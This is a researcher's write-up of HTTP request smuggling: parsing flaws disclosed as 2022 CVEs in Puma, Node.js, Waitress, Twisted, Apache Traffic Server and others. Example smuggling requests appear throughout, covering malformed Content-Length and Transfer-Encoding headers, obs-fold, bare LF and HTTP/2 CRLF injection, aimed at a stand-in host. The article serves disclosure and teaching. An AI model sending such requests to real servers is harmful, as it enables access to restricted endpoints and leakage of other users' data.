HTTP Request Smuggling in the Multiverse of Parsing Flaws
Nowadays, novel HTTP request smuggling techniques rely on subtle deviations from the HTTP standard. Here, I discuss some of my recent findings and novel techniques.
Some time earlier this year, I conducted a bit of independent research on HTTP request smuggling and found a couple of vulnerabilities.
This article expands on my talk on the topic at BSides Singapore 2022.
To understand HTTP request smuggling, we have to first take a trip down memory lane.
The HTTP protocol has undergone several changes since its inception, and the latest protocol version is HTTP/3. While HTTP/2 is the most popular version today, HTTP/1.x still makes up a significant share of web traffic and remains crucial to understanding HTTP request smuggling.
The major difference between HTTP/1.x and HTTP/2 is that HTTP/2 evolved from a purely text-based protocol to a binary one. In HTTP/1.x, the `Content-Length` and `Transfer-Encoding` headers determine the length of an HTTP request. It is this reliance on two special headers that enabled the earliest discoveries of HTTP request smuggling.
But this alone is not enough. In HTTP/1.0, one TCP connection is used for each HTTP request, so no two HTTP requests can interfere with each other. When HTTP/1.1 came along, the concept of persistent connections was introduced. This opened up an entirely new attack vector: if one request earlier in the TCP stream could interfere with a downstream request, a variety of vulnerabilities could occur.
This becomes particularly relevant when considering architectures comprising a frontend proxy (such as Nginx, Apache HTTP Server and HAProxy) with backend web servers. Consider the following example.
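The original diagram is not reproduced here, but a minimal reconstruction of such a payload (with `vulnerable.com` as a stand-in host) might look like this:

```http
POST / HTTP/1.1
Host: vulnerable.com
Content-Length: 53
Transfer-Encoding: chunked

0

GET /internal HTTP/1.1
Host: vulnerable.com

```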
The frontend proxy parses the `Content-Length` header, forwarding the `GET /internal` request as part of the 53-byte request body.
The backend web server, on the other hand, parses the `Transfer-Encoding: chunked` header and interprets the first request as ending at the `0` chunk size. This means that from the perspective of the backend server, there are two requests: one to `/` and one to `/internal`.
Note that in this case, the backend is spec-compliant and the frontend proxy is not. According to RFC 7230 Section 3.3.3, the `Transfer-Encoding` header overrides the `Content-Length`:
> If a message is received with both a Transfer-Encoding and a Content-Length header field, the Transfer-Encoding overrides the Content-Length. Such a message might indicate an attempt to perform request smuggling (Section 9.5) or response splitting (Section 9.4) and ought to be handled as an error. A sender MUST remove the received Content-Length field prior to forwarding such a message downstream.
This section is split into different groups of parsing flaws. Because I often compile multiple issues into a single report, the resulting CVEs comprise multiple issues. It is more meaningful to discuss the various types of issues than each CVE individually.
When I was looking into various web servers and proxies, I noticed some things that I would like to point out.
First, a lot of research has been done on web proxy technologies, but not much on backend servers. This is reflected in the relative security of projects like Nginx and HAProxy against request smuggling. It is important to note that in most cases, a request smuggling attack reveals a two-pronged issue that requires both the frontend proxy and the backend server to be somewhat non-compliant.
This sometimes makes it difficult to demonstrate impact when disclosing vulnerabilities, as the impact often has to be qualified with the precondition that some other server in the stack is also non-compliant. It is important for maintainers not to dismiss request smuggling vectors as low-impact or insignificant just because of this.
Second, most "traditional" request smuggling techniques have been patched. These are techniques that have been popularly taught and demonstrated, for example:

- Duplicate `Content-Length` headers (CL.CL)
- Frontend server uses `Content-Length`, backend uses `Transfer-Encoding` (CL.TE)
- Frontend server uses `Transfer-Encoding`, backend uses `Content-Length` (TE.CL)
The next part of this article will discuss subtle deviations from the HTTP standard that can lead to request smuggling. These are vectors that may seem trivial but are often neglected.
Lastly, when implementing RFC 7230, the `SHOULD` clauses are often equally important in preventing HTTP request smuggling. Differences in interpreting such clauses can sometimes lead to disagreements between servers.
According to the RFC, the `Content-Length` value consists of one or more `DIGIT`s (`Content-Length = 1*DIGIT`). A `DIGIT` in the ABNF standard is strictly `0`-`9` only. However, due to lenient number-parsing implementations, many parsers will accept non-conformant values like `+23`.
Consider the following requests.
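The original figure is not reproduced here; a reconstruction along the following lines (again with a stand-in host) illustrates the idea:

```http
POST / HTTP/1.1
Host: vulnerable.com
Content-Length: +23

GET / HTTP/1.1
Dummy: GET /forbidden HTTP/1.1
Host: vulnerable.com

```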
In a previous version of Apache Traffic Server, the `+23` content length is silently ignored, and the first request is interpreted as having zero content length.
Many web servers, however, will interpret `+23` as a valid content length. This means that the requests will now be interpreted very differently: the first request has a 23-byte body ending at the `Dummy` header, and the second request will instead be routed to `/forbidden`.
This starts to get more interesting when negative numbers are involved. Twisted Web, for example, exhibited unexpected behaviour when encountering negative content lengths.
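The original capture is not reproduced here; a hypothetical trigger might look like this:

```http
POST / HTTP/1.1
Host: vulnerable.com
Content-Length: -16

GET /forbidden HTTP/1.1
```

What a parser does after naively converting the value to a negative integer (for example, when slicing its receive buffer) is entirely implementation-specific, which is exactly what makes signed values dangerous.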
Chunk sizes also present a similar issue: servers should not accept the `0x` prefix. Because of differences in parsing hexadecimal numbers, a simple request like the following can be interpreted differently.
Some parsers will simply parse the number up to the first non-hex digit. This leads to the early termination of the request and consequently the smuggling of a second request.
We can see how language-specific behaviour plays a part in these scenarios. In fact, the behaviour of the Python-based servers was in line with how `int()` handles integer strings, and Puma's behaviour was in line with Ruby's `to_i` (which parses integer strings up to the first non-decimal character).
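Python's side is easy to verify in an interpreter (this is plain `int()` behaviour, not Waitress or Twisted code):

```python
# int() accepts signed values, and the 0x prefix when base 16 is given -
# exactly the leniency that shows up in the CVEs below.
print(int("+23"))       # 23
print(int("-23"))       # -23
print(int("0x2c", 16))  # 44
```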
| CVE | Project | Issue |
| --- | --- | --- |
| CVE-2022-24761 | Waitress (Python) | Accepts 'signed' (±) and `0x`-prefixed `Content-Length` and chunk sizes |
| CVE-2022-24801 | Twisted (Python) | Accepts 'signed' (±) and `0x`-prefixed `Content-Length` and chunk sizes |
| CVE-2022-24790 | Puma (Ruby) | Accepts invalid `Content-Length` values via `to_i`, e.g. `abc` → `0`, `99 balloons` → `99` |
Headers allow for optional whitespace (`OWS`) before and after the field values. Importantly, only two whitespace characters are considered valid here: the space and the horizontal tab. But this definition of whitespace is often incompatible with that of generic stripping functions in most programming languages.
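For reference, RFC 7230 defines:

```abnf
header-field = field-name ":" OWS field-value OWS
OWS          = *( SP / HTAB )
```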
Consider the following request (a rough reconstruction is sketched below). If a proxy were to interpret the transfer coding as `\rchunked`, this may be treated as an invalid encoding and ignored. The second request would then contain a 23-byte body including `GET /admin`.
But a server that incorrectly strips the `\r` character from the `Transfer-Encoding` header would not see it the same way.
A much more classic technique involves whitespace between the header name and the colon. By stripping header names of whitespace, headers like `Content-Length : 5` were allowed in mitmproxy. This particular case is clearly addressed in the RFC.
| CVE | Project | Issue |
| --- | --- | --- |
| CVE-2022-28129 | Apache Traffic Server | `Content-Length[\x0b]: 0` accepted |
| CVE-2022-24766 | mitmproxy (Python) | `Content-Length[SP]: X` accepted |
| CVE-2022-1705 | net/http (Golang) | `Transfer-Encoding: \rchunked` accepted |
A quick primer on the `Transfer-Encoding` header: encodings are stated from first applied to last, so `gzip, chunked` means the body was gzipped first and then chunked - the decoding server removes the `chunked` framing before decompressing the `gzip` data.
According to RFC 7230, `chunked` must be the final encoding in the `Transfer-Encoding` header.
But the deprecated RFC 2616 actually allows the `identity` encoding, which means "the use of no transformation whatsoever". In fact, in this RFC, the `chunked` transfer-coding is only used when the `Transfer-Encoding` value is not `identity`.
Puma, in particular, assumed the opposite: as long as any of the `Transfer-Encoding` values is `chunked`, the message is parsed with chunked encoding. This means that the following request is considered `chunked`, although the final transformation is `identity`.
Until recently, many major proxies still supported the `identity` transfer-coding. This meant that any of these proxies used in combination with Puma would have allowed request smuggling through the above request.
It is also important to reject any invalid `Transfer-Encoding` value. Servers often accept invalid values due to parsing flaws, and silently ignoring these malformed transfer-codings opens the door to request smuggling. When no supported `Transfer-Encoding` values were found, Puma would silently ignore the header altogether.
This is a good example of how research on web servers is equally important to that on web proxies. While the argument could be made that the fault lies with Apache Traffic Server for accepting the malformed "chunked" value, the attack would not have been possible if Puma threw a `400 Bad Request` when encountering it.
Because of the variability of the `Transfer-Encoding` header, the way various servers parse it is quite revealing. In particular, I noted a curious behaviour in the Node.js `http` module.
In the original code, when `chunked` is matched, a check is made to see whether `chunked` is the final encoding. If a CRLF sequence is encountered, `chunked` is taken to be the final encoding, and the request body is parsed as chunked. Otherwise, the parser attempts to match `chunked` again.
But this logic forgets to look for a `,` separator if the CRLF sequence is not found, meaning that the following is a valid chunked request.
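A sketch of such a request:

```http
POST / HTTP/1.1
Host: vulnerable.com
Transfer-Encoding: chunkedchunked

5
AAAAA
0

```

A peer that instead ignores `chunkedchunked` as an unknown encoding will fall back to a different framing, which is all a desync needs.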
| CVE | Project | Issue |
| --- | --- | --- |
| CVE-2022-24790 | Puma (Ruby) | Does not check that `chunked` is the final encoding; silently ignores invalid encodings |
| CVE-2022-32213 | http (Node.js) | Accepts malformed encodings, e.g. `chunkedchunked` |
Historically, multi-line headers were allowed by starting each extra line with either a space or a horizontal tab. RFC 7230 deprecates such line folding (`obs-fold`). For backwards compatibility, `obs-fold` is supported by most servers. This is spec-compliant.
The trouble begins when implementing the rest of the spec while supporting `obs-fold`. As we saw above, one assumption made by the Node.js parser was that the `Transfer-Encoding` header would end when encountering the CRLF sequence: `chunked` followed by CRLF would mean that the transfer-coding is `chunked`.
This makes sense until we consider that the parser also supports `obs-fold`, so the following multi-line header would be interpreted wrongly.
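Something along these lines (note the leading space on the second line, which makes it an `obs-fold` continuation of the `Transfer-Encoding` value):

```http
POST / HTTP/1.1
Host: vulnerable.com
Transfer-Encoding: chunked
 , identity

5
AAAAA
0

```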
Instead of parsing the transfer-coding as `identity`, the parser uses `chunked`.
| CVE | Project | Issue |
| --- | --- | --- |
| CVE-2022-32215 | http (Node.js) | Early termination of multi-line `Transfer-Encoding` headers |
This discussion was not included in my talk because this is a slightly more contested topic and it is sometimes ambiguous whether this is a legitimate issue.
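The vector concerns bare LF characters inside header values. Consider a request along these lines (a sketch, where `[\n]` denotes a literal LF byte):

```http
GET / HTTP/1.1
Host: vulnerable.com
X-Ignore: x[\n][\n]GET /forbidden HTTP/1.1[\n]X: y

```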
Note that each line above is delimited by the CRLF sequence.
If a proxy strictly delimits each line by CRLF and incorrectly allows the `\n` character as a valid character in header values, it sees a single request. But a backend that delimits each line by only a bare LF will see two requests.
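Continuing the sketch, the backend's view is:

```http
GET / HTTP/1.1
Host: vulnerable.com
X-Ignore: x

GET /forbidden HTTP/1.1
X: y
```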
While this seems dangerous, the spec actually allows a single LF to be used to delimit lines, albeit in a `MAY` clause.
Some servers, like Waitress and Node.js, have taken this potential vector into consideration and switched to strictly delimiting lines with the CRLF sequence.
There are some individual findings that didn't fit into any of the above groups but are interesting to discuss nonetheless. This discussion was not included in my talk for brevity.
This one is a relatively common technique. Puma allowed multiple `Content-Length` headers.
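A minimal sketch of such a request:

```http
POST / HTTP/1.1
Host: vulnerable.com
Content-Length: 0
Content-Length: 5

AAAAA
```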
Note that internally, this results in a final `Content-Length` value of `0, 5`, but Ruby's `to_i` function stops parsing at the first non-decimal character, and therefore the first `Content-Length` header is used to determine the request length. This is non-compliant.
If an upstream proxy processes the second `Content-Length` header instead, request smuggling attacks can occur.
This one is quite interesting. According to the RFC, whitespace between the start-line and the first header field is not allowed. It even explicitly mentions the associated security risks.
Node.js allowed whitespace in this location, leading to some potentially interesting vectors. In the following request, the content length header name is taken to be the literal string `" Content-Length"`, which is different from the normal `"Content-Length"` header. It is therefore not indicative of the request body length.
If a frontend proxy parses the malformed `Content-Length` header, smuggling attacks can occur. However, I have yet to find a proxy that exhibits such behaviour - most will correctly reject the request as per the RFC.
Since there was limited demonstrable impact, this was handled by the Node.js team as a public issue.
Previously, we discussed how HTTP/2 uses a binary protocol instead of the text-based one used by HTTP/1.x. Each HTTP/2 data frame has an associated length field built into the protocol, ensuring that there is no ambiguity in HTTP/2 request body lengths.
While this sounds good on paper, taking a closer look at the type of architecture required for request smuggling attacks reveals that many of our old techniques are still relevant here.
Even if HTTP/2 is used between the client and frontend proxy, there is no real reason to use HTTP/2 between the proxy and its backend servers. This means that HTTP/2 requests are often rewritten to HTTP/1.x before being forwarded to HTTP/1.x backend servers.
One interesting consequence of this is that, since the CRLF sequence is no longer used to delimit request lines in HTTP/2, we could potentially perform CRLF injection on the downgraded HTTP/1.1 request by simply supplying these characters in an HTTP/2 header.
I came across one interesting application of this in Apache Traffic Server. By injecting the CRLF sequence in the HTTP/2 headers frame, we could inject new headers into the rewritten HTTP/1.1 request. More broadly, we could also modify everything below the injection point, including the request body.
While header injection can be sufficient to cause smuggling attacks, I noticed an interesting aspect of this particular vulnerability. Any headers added below our injection point could be forced into the request body by injecting the double-CRLF sequence.
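Schematically, and purely as a hedged illustration (the `innocent` and `Injected-Header` names are hypothetical), an HTTP/2 request carrying literal `\r\n` bytes in a header value:

```text
:method: GET
:path: /
:authority: vulnerable.com
innocent: value\r\nInjected-Header: 1\r\n\r\nGET /internal HTTP/1.1
```

could be downgraded into the following HTTP/1.1 request:

```http
GET / HTTP/1.1
Host: vulnerable.com
innocent: value
Injected-Header: 1

GET /internal HTTP/1.1
```

Anything after the injected double CRLF, including headers the proxy would have appended below the injection point, is pushed out of the header block - into the body or into a smuggled follow-up request.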
Consider an endpoint that stores the request body for later retrieval. Sensitive headers pushed into the request body might then be leaked, depending on the application logic.
| CVE | Project | Issue |
| --- | --- | --- |
| CVE-2022-25763 | Apache Traffic Server | CRLF injection when downgrading from HTTP/2 to HTTP/1.1 |
Just as I'm writing this, new research has been released on client-side desync attacks. I found this new development particularly interesting because it forces a paradigm shift on how we approach smuggling attacks. Client-side desync does not require a proxy-server architecture, only a browser and a single web server.
It would be interesting to see how the community will build on this research to find new and interesting discoveries.